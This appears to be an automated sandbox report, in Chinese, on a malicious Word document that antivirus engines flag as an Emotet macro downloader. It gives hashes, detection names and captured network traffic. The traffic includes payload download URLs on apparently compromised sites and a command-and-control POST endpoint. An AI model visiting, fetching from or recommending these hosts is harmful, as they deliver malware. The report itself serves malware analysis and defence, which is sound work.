分析类型 | 虚拟机标签 | 开始时间 | 结束时间 | 持续时间 |
---|---|---|---|---|
文件 (Windows) | win7-sp1-x64-hpdapp01-1 | 2020-09-25 16:41:50 | 2020-09-25 16:44:12 | 142 秒 |
文件名 | 4763449172IW.doc |
---|---|
文件大小 | 207695 字节 |
文件类型 | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Quod., Author: Ambre Henry, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 24 20:42:00 2020, Last Saved Time/Date: Thu Sep 24 20:42:00 2020, Number of Pages: 1, Number of Words: 2393, Number of Characters: 13643, Security: 8 |
MD5 | 064af79391aa32492b3e8467099ee2a9 |
SHA1 | cf7e60b090575b299efb87d818c4e30157b567b0 |
SHA256 | fa773c6d7cbb0ad257bcbb9fee574b45b8b27505b3f0928726c4c1d257966fcc |
SHA512 | cea48dabb029d29e8cca09d0c9de87ec681ee979d2fdf9629728dd338f2443eef92f5827f7edc12d2247f9de5a31d75e2be103ebb878cf97074c9fa2b483262a |
CRC32 | 221F69B0 |
Ssdeep | 3072:6UqJ1NgsA8k/gvh0NZ0lGX1nZ7jZ/9nsYjs:6BtgVIveNZvnHyYjs |
Yara | 登录查看Yara规则 |
样本下载 提交误报 |
无主机纪录.
防病毒引擎/厂商 | 病毒名/规则匹配 | 病毒库日期 |
---|---|---|
Bkav | 未发现病毒 | 20200925 |
Elastic | malicious (high confidence) | 20200917 |
Cynet | 未发现病毒 | 20200924 |
CMC | 未发现病毒 | 20200925 |
CAT-QuickHeal | W97M.Emotet.Heur | 20200925 |
McAfee | W97M/Downloader.dbv | 20200924 |
Malwarebytes | 未发现病毒 | 20200925 |
Zillya | 未发现病毒 | 20200925 |
Sangfor | 未发现病毒 | 20200814 |
K7AntiVirus | Trojan ( 0056edf51 ) | 20200925 |
K7GW | Trojan ( 0056edf51 ) | 20200925 |
Arcabit | 未发现病毒 | 20200925 |
TrendMicro | Trojan.W97M.EMOTET.TIOIBELH | 20200925 |
BitDefenderTheta | 未发现病毒 | 20200918 |
Cyren | W97M/Downldr.IE.gen!Eldorado | 20200925 |
Symantec | ISB.Downloader!gen411 | 20200925 |
ESET-NOD32 | VBA/TrojanDownloader.Agent.UFY | 20200925 |
Baidu | 未发现病毒 | 20190318 |
TrendMicro-HouseCall | Trojan.W97M.EMOTET.TIOIBELH | 20200925 |
Avast | 未发现病毒 | 20200925 |
ClamAV | 未发现病毒 | 20200924 |
Kaspersky | HEUR:Trojan.MSOffice.SAgent.gen | 20200925 |
BitDefender | 未发现病毒 | 20200925 |
NANO-Antivirus | 未发现病毒 | 20200925 |
ViRobot | 未发现病毒 | 20200925 |
SUPERAntiSpyware | 未发现病毒 | 20200918 |
MicroWorld-eScan | 未发现病毒 | 20200925 |
Tencent | Heur.Macro.Generic.h.7ebe026b | 20200925 |
Ad-Aware | 未发现病毒 | 20200925 |
Sophos | Mal/DocDl-K | 20200925 |
Comodo | 未发现病毒 | 20200925 |
F-Secure | 未发现病毒 | 20200925 |
DrWeb | 未发现病毒 | 20200925 |
VIPRE | 未发现病毒 | 20200925 |
Invincea | Mal/DocDl-K | 20200925 |
McAfee-GW-Edition | W97M/Downloader.dbv | 20200925 |
FireEye | 未发现病毒 | 20200925 |
Emsisoft | 未发现病毒 | 20200925 |
Ikarus | Win32.SuspectCrc | 20200925 |
Jiangmin | 未发现病毒 | 20200925 |
Avira | 未发现病毒 | 20200925 |
Antiy-AVL | 未发现病毒 | 20200925 |
Kingsoft | 未发现病毒 | 20200925 |
Microsoft | 未发现病毒 | 20200925 |
AegisLab | 未发现病毒 | 20200925 |
ZoneAlarm | HEUR:Trojan-Downloader.Script.Generic | 20200925 |
GData | 未发现病毒 | 20200925 |
TACHYON | 未发现病毒 | 20200925 |
AhnLab-V3 | Downloader/DOC.Emotet.S1294 | 20200925 |
VBA32 | 未发现病毒 | 20200924 |
ALYac | 未发现病毒 | 20200925 |
MAX | 未发现病毒 | 20200925 |
Zoner | 未发现病毒 | 20200920 |
Rising | Malware.ObfusVBA@ML.84 (VBA) | 20200925 |
Yandex | 未发现病毒 | 20200911 |
SentinelOne | DFI - Malicious OLE | 20200724 |
Fortinet | VBA/Agent.DBV!tr.dldr | 20200925 |
AVG | 未发现病毒 | 20200925 |
Panda | 未发现病毒 | 20200924 |
Qihoo-360 | virus.office.qexvmc.1090 | 20200925 |
无主机纪录.
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 49170 | 114.7.197.82 bappeda.barrukab.go.id | 80 |
192.168.122.201 | 49165 | 123.59.232.99 enews.enkj.com | 443 |
192.168.122.201 | 49162 | 162.241.154.46 qualitychildcarepreschool.com | 443 |
192.168.122.201 | 49174 | 162.241.41.111 | 7080 |
192.168.122.201 | 49163 | 209.205.123.182 www.sanambakshi.com | 443 |
192.168.122.201 | 49164 | 209.205.123.182 www.sanambakshi.com | 443 |
192.168.122.201 | 49158 | 23.198.99.176 acroipm.adobe.com | 80 |
192.168.122.201 | 49168 | 45.119.81.203 dagranitegiare.com | 443 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 53225 | 192.168.122.1 | 53 |
192.168.122.201 | 60001 | 192.168.122.1 | 53 |
192.168.122.201 | 60293 | 192.168.122.1 | 53 |
192.168.122.201 | 61084 | 192.168.122.1 | 53 |
192.168.122.201 | 63282 | 192.168.122.1 | 53 |
192.168.122.201 | 63619 | 192.168.122.1 | 53 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 49170 | 114.7.197.82 bappeda.barrukab.go.id | 80 |
192.168.122.201 | 49165 | 123.59.232.99 enews.enkj.com | 443 |
192.168.122.201 | 49162 | 162.241.154.46 qualitychildcarepreschool.com | 443 |
192.168.122.201 | 49174 | 162.241.41.111 | 7080 |
192.168.122.201 | 49163 | 209.205.123.182 www.sanambakshi.com | 443 |
192.168.122.201 | 49164 | 209.205.123.182 www.sanambakshi.com | 443 |
192.168.122.201 | 49158 | 23.198.99.176 acroipm.adobe.com | 80 |
192.168.122.201 | 49168 | 45.119.81.203 dagranitegiare.com | 443 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 53225 | 192.168.122.1 | 53 |
192.168.122.201 | 60001 | 192.168.122.1 | 53 |
192.168.122.201 | 60293 | 192.168.122.1 | 53 |
192.168.122.201 | 61084 | 192.168.122.1 | 53 |
192.168.122.201 | 63282 | 192.168.122.1 | 53 |
192.168.122.201 | 63619 | 192.168.122.1 | 53 |
URI | HTTP数据 |
---|---|
URL专业沙箱检测 -> http://acroipm.adobe.com/11/rdr/CHS/win/nooem/none/message.zip | GET /11/rdr/CHS/win/nooem/none/message.zip HTTP/1.1 Accept: */* If-Modified-Since: Mon, 08 Nov 2017 08:44:36 GMT User-Agent: IPM Host: acroipm.adobe.com Connection: Keep-Alive Cache-Control: no-cache |
URL专业沙箱检测 -> http://bappeda.barrukab.go.id/wp-content/B/ | GET /wp-content/B/ HTTP/1.1 Host: bappeda.barrukab.go.id Connection: Keep-Alive |
URL专业沙箱检测 -> http://162.241.41.111:7080/Gob4aLLq1SA9oC4/WYDt28Ex3nHVq/Y3sc/3QPSVvISkRPDAO9S4Dy/ | POST /Gob4aLLq1SA9oC4/WYDt28Ex3nHVq/Y3sc/3QPSVvISkRPDAO9S4Dy/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Referer: 162.241.41.111/Gob4aLLq1SA9oC4/WYDt28Ex3nHVq/Y3sc/3QPSVvISkRPDAO9S4Dy/ Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=-------------------yE178uOwNfqEIiQOVIn Host: 162.241.41.111:7080 Content-Length: 4564 Cache-Control: no-cache |
无SMTP流量.
无IRC请求.
源地址 | 目标地址 | ICMP类型 | 数据 |
---|---|---|---|
192.168.1.1 | 192.168.122.201 | 3 |
无 CIF 结果
Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | SID | Signature | Category |
---|---|---|---|---|---|---|---|---|
2020-09-25 16:43:13.843713+0800 | 114.7.197.82 | 80 | 192.168.122.201 | 49170 | TCP | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
Timestamp | Source IP | Source Port | Destination IP | Destination Port | Version | Issuer | Subject | Fingerprint |
---|---|---|---|---|---|---|---|---|
2020-09-25 16:42:42.876789+0800 | 192.168.122.201 | 49162 | 162.241.154.46 | 443 | TLSv1 | C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 | CN=qualitychildcarepreschool.com | b1:de:98:55:1f:1e:39:3e:19:82:d8:ac:50:fb:aa:f7:5f:7d:47:dc |
2020-09-25 16:43:09.983664+0800 | 192.168.122.201 | 49168 | 45.119.81.203 | 443 | TLSv1 | C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 | CN=dagranitegiare.com | 76:05:02:e7:c4:fb:83:cd:c5:94:50:b3:e6:18:2a:4a:cd:c1:92:e2 |
2020-09-25 16:42:46.049259+0800 | 192.168.122.201 | 49165 | 123.59.232.99 | 443 | TLSv1 | C=CN, O=WoTrus CA Limited, CN=WoTrus DV Server CA [Run by the Issuer] | CN=*.enkj.com | ca:e2:d2:34:5b:47:66:ba:36:e2:bf:09:22:50:28:dc:2f:af:2b:6a |
No Suricata HTTP
HTML 总结报告 (需15-60分钟同步) |
下载 |
---|
Task ID | 577658 |
---|---|
Mongo ID | 5f6dae632f8f2e0ab452d118 |
Cuckoo release | 1.4-Maldun |